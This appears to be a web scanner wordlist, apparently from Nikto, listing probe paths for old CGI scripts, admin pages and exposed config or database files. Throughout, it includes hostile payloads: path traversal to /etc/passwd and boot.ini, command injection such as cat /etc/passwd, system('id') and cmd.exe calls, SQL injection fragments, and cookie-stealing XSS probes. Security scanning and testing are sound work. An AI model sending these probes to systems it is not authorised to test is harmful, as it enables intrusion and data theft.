@saurabh96216
Created February 9, 2021 01:15
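CGI wordlist (one request path or probe string per line; the JUNK(n) tokens appear to be unexpanded scanner placeholders rather than literal paths, and a few long entries look cut off)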
TiVoConnect?Command=QueryServer
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi
cgi-bin/flexform.cgi
cgi-bin/flexform
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/perlshop.cgi
cfappman/index.cfm
cfdocs/examples/cvbeans/beaninfo.cfm
cfdocs/examples/parks/detail.cfm
kboard/
lists/admin/
splashAdmin.php
ssdefs/
sshome/
tiki/
tiki/tiki-install.php
scripts/samples/details.idc
_vti_bin/shtml.exe
cgi-bin/handler.cgi
cgi-bin/finger
cgi-bin/finger.pl
cgi-bin/formmail.cgi
cgi-bin/formmail.pl
cgi-bin/formmail
cgi-bin/get32.exe
cgi-bin/gm-authors.cgi
cgi-bin/guestbook/passwd
cgi-bin/horde/test.php?mode=phpinfo
cgi-bin/photo/protected/manage.cgi
cgi-bin/wrap.cgi
./
~root/
cgi-bin/wrap
forums/@ADMINconfig.php
forums/config.php
ganglia/
guestbook/guestbookdat
guestbook/pwd
help/
hola/admin/cms/htmltags.php?datei=./sec/data.php
horde/imp/test.php
horde/test.php?mode=phpinfo
imp/horde/test.php?mode=phpinfo
imp/horde/test.php
index.html.bak
index.html~
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
global.inc
cgi-bin/horde/test.php
inc/common.load.php
inc/config.php
inc/dbase.php
cgi-bin/visadmin.exe
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/echo.bat?&dir+c:\
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/guestbook.cgi
cgi-bin/guestbook.pl
cgi-bin/ss
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
guestbook/guestbook.html
html/cgi-bin/cgicso?query=AAA
geeklog/users.php
gb/index.php?login=true
guestbook/admin.php
cgi-bin/gH.cgi
cgi-bin/gm-cplog.cgi
getaccess
help.html
cgi-bin/gm.cgi
filemanager/filemanager_forms.php
cgi-bin/AT-admin.cgi
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/blog/mt.cfg
cgi-bin/cart.pl?db='
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt/mt-check.cgi
cfdocs/expeval/openfile.cfm
index.php/123
mambo/index.php?Itemid=JUNK(5)
profile.php?u=JUNK(8)
ticket.php?id=99999
vgn/login/1,501,,00.html?cookieName=x--\>
a%5c.aspx
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
admin/browse.asp?FilePath=c:\&Opt=2&level=0
cgi-bin/architext_query.pl
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
tsweb/
cgi-bin/blog/mt-load.cgi
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/tools/ctss.idc
bigconf.cgi
billing/billing.apw
blah_badfile.shtml
blah-whatever-badfile.jsp
vgn/style
scripts/no-such-file.pl
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/moin.cgi?test
autologon.html?10514
basilix/mbox-list.php3
basilix/message-read.php3
clusterframe.jsp
IlohaMail/blank.html
bb-dnbd/faxsurvey
cartcart.cgi
scripts/Carello/Carello.dll
scripts/tools/dsnform.exe
scripts/tools/dsnform
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
prd.i/pgen/
readme.eml
scripts/httpodbc.dll
scripts/proxy/w3proxy.dll
scripts/root.exe?/c+dir+c:\+/OG
SiteServer/admin/
siteseed/
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
pccsmysqladm/incs/dbconnect.inc
iisadmin/
password.inc
PDG_Cart/oder.log
web-console/ServerInfo.jsp%00
global.asa
exchange/lib/AMPROPS.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/logon.inc
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
ows/restricted%2eshow
WEB-INF./web.xml
view_source.jsp
w-agora/
vider.php3
exchange/root.asp?acs=anon
officescan/cgi/cgiChkMasterPwd.exe
%NETHOOD%/
cgi-bin/astrocam.cgi
cgi-bin/badmin.cgi
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/mgrqcgi
cgi-bin/wconsole.dll
cgi-bin/webplus.exe?about
pbserver/pbserver.dll
administrator/gallery/uploadimage.php
pafiledb/includes/team/file.php
phpEventCalendar/file_upload.php
servlet/com.unify.servletexec.UploadServlet
cgi-win/uploader.exe
scripts/cpshost.dll
scripts/repost.asp
upload.asp
uploadn.asp
uploadx.asp
wa.exe
basilix/compose-attach.php3
server/
cgi-bin/fpsrvadm.exe
siteminder/smadmin.html
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/login
webtop/wdk/samples/index.jsp
cgi-bin/.cobalt
WEB-INF/web.xml
forum/admin/wwforum.mdb
fpdb/shop.mdb
guestbook/admin/o12guest.mdb
midicart.mdb
MIDICART/midicart.mdb
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
news/news.mdb
newuser?Image=../../database/rbsserv.mdb
shopdbtest.asp
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
SilverStream/Meta/Tables/?access-mode=text
database/db2000.mdb
cgi-bin/mailit.pl
cgi-bin/search
doc/webmin.config.notes
error/HTTP_NOT_FOUND.html.var
oem_webstage/cgi-bin/oemapp_cgi
ADMINconfig.php
cgi-bin/.access
cgi-bin/%2e%2e/abyss.conf
cgi-bin/data/fetch.php?page=
cgi-bin/empower?DB=whateverwhatever
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/store/agora.cgi?page=whatever33.html
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
article.php?article=4965&post=1111111111
blah123.php
categorie.php3?cid=june
CFIDE/probe.cfm
contents.php?new_language=elvish&mode=select
download.php?op=viewdownload
examples/basic/servlet/HelloServlet
home.php?arsc_language=elvish
hostadmin/?page='
index.php?file=index.php
jgb_eng_php3/cfooter.php3
JUNK(5).csp
modules.php?name=Downloads&d_op=viewdownload
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
path/nw/article.php?id='
pw/storemgr.pw
rtm.log
scozbook/view.php?PG=whatever
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
shopa_sessionlist.asp
simplebbs/users/users.php
sips/sipssys/users/a/admin/user
tcb/files/auth/r/root
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
vchat/msg.txt
vgn/license
web.config
webamil/test.php?mode=phpinfo
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webmail/horde/test.php
whateverJUNK(4).html
ws_ftp.ini
WS_FTP.ini
cgi-bin/MsmMask.exe
_mem_bin/auoconfig.asp
_mem_bin/remind.asp
exchange/lib/ATTACH.INC
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
trace.axd
tvcs/getservers.exe?action=selects1
whatever.htr
nsn/fdir.bas:ShowVolume
nsn/fdir.bas
servlet/webacc?User.html=noexist
forum/admin/database/wwForum.mdb
webmail/blank.html
jamdb/
cgi/cgiproc?
cgi-bin/addbanner.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/shtml.dll
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
cgi-bin/aglimpse.cgi
cgi-bin/aglimpse
cgi-bin/architext_query.cgi
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=AAA
servlet/SchedulerTransfer
servlet/sunexamples.BBoardServlet
servlets/SchedulerTransfer
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/hello.bat?&dir+c:\
cgi-bin/post32.exe|dir%20c:\
perl/-e%20print%20Hello
admin.cgi
interscan/
vgn/legacy/save
IDSWebApp/IDSjsp/Login.jsp
quikstore.cfg
quikstore.cgi
securecontrolpanel/
siteminder
webmail/
Xcelerate/LoginPage.html
_cti_pvt/
smg_Smxcfg30.exe?vcc=3560121183d3
examples/servlets/index.html
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
wikihome/action/conflict.php
cgi-bin/archie
cgi-bin/calendar.pl
cgi-bin/calendar
cgi-bin/date
cgi-bin/fortune
cgi-bin/redirect
cgi-bin/uptime
cgi-bin/wais.pl
/
webtop/wdk/
SilverStream
signon
upd/
examples/jsp/source.jsp??
lpt9
cfcache.map
cfdocs/cfcache.map
CVS/Entries
lpt9.xtp
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
asp/sqlqhit.asp
asp/SQLQHit.asp
iissamples/issamples/sqlqhit.asp
iissamples/issamples/SQLQHit.asp
ISSamples/sqlqhit.asp
ISSamples/SQLQHit.asp
junk.aspx
oc/Search/sqlqhit.asp
oc/Search/SQLQHit.asp
search/htx/sqlqhit.asp
search/htx/SQLQHit.asp
search/sqlqhit.asp
search/SQLQHit.asp
sqlqhit.asp
SQLQHit.asp
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
?Open
?OpenServer
catalog.nsf
cersvr.nsf
cgi-bin/testing_whatever
domlog.nsf
events4.nsf
log.nsf
names.nsf
LOGIN.PWD
USER/CONFIG.AP
cgi-bin/mail
cgi-bin/nph-error.pl
cgi-bin/post-query
cgi-bin/query
cgi-bin/test-cgi.tcl
cgi-bin/test-env
.perf
admin-serv/config/admpw
test.php%20
*.*
cgi-bin/cgi_process
ht_root/wwwroot/-/local/httpd$map.conf
JUNK(10)
local/httpd$map.conf
tree
cgi-bin/index.js0x70
%00/
%2e/
%2f/
%5c/
index.jsp%00x
weblogic
%a%s%p%d
index.html%20
852566C90012664F
hidden.nsf
mail.box
open?
setup.nsf
statrep.nsf
webadmin.nsf
cgi-bin/cgitest.exe
examples/servlet/AUX
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cfdocs/cfmlsyntaxcheck.cfm
Config1.htm
contents/extensions/asp/1
WebAdmin.dll?View=Logon
cgi-bin/Pbcgi.exe
cgi-bin/testcgi.exe
cgi-win/cgitest.exe
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
c/winnt/system32/cmd.exe?/c+dir+/OG
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/samples/adctest.asp
nikto.ida
SUNWmc/htdocs/
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-shl/win-c-sample.exe
examples/servlet/TroubleShooter
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
goform/CheckLogin?login=root&password=tslinux
[SecCheck]/..%2f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%252f..%252f../ext.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
.nsf/../winnt/win.ini
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
................../config.sys
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
php/php.exe?c:\winnt\boot.ini
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
wx/s.dll?d=/boot.ini
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
php/php.exe?c:\boot.ini
../../../../../../../../../boot.ini
../../../../winnt/repair/sam._
..\\..\\..\\..\\..\\..\\..\\boot.ini
//etc/passwd
//etc/hosts
///./../.../boot.ini
.cobalt/sysManage/../admin/.htaccess
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
DomainFiles/*//../../../../../../../../../../etc/passwd
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
index.php?download=/winnt/win.ini
index.php?download=/windows/win.ini
index.php?download=/etc/passwd
index.php?|=../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../boot.ini
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
phprocketaddin/?page=../../../../../../../../../../boot.ini
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phptonuke.php?filnavn=/etc/passwd
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
viewpage.php?file=/etc/passwd
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/opendir.php?/etc/passwd
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewsource?/etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
page.cgi?../../../../../../../../../../etc/passwd
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
athenareg.php?pass=%20;cat%20/etc/passwd
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\temp\temp.class
../../../../../../../../../../etc/passwd
.../.../.../.../.../.../.../.../.../boot.ini
................../etc/passwd
%3f.jsp
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%00
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
admentor/adminadmin.asp
POSTNUKEMy_eGallery/public/displayCategory.php
cgi-bin/classifieds/index.cgi
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
userinfo.php?uid=1;
site/'
postnuke/index.php?module=My_eGallery
postnuke/html/index.php?module=My_eGallery
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpBB2/search.php?search_id=1\
index.php?module=My_eGallery
author.asp
horde/test.php
examples/cookie
examples/session
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
index.php?option=search&searchword=<script>alert(document.cookie);</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
index.php?dir=<script>alert('Vulnerable')</script>
https-admserv/bin/index?/<script>alert(document.cookie)</script>
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
article.cfm?id=1'<script>alert(document.cookie);</script>
upload.php?type=\"<script>alert(document.cookie)</script>
soinfo.php?\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.stm
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
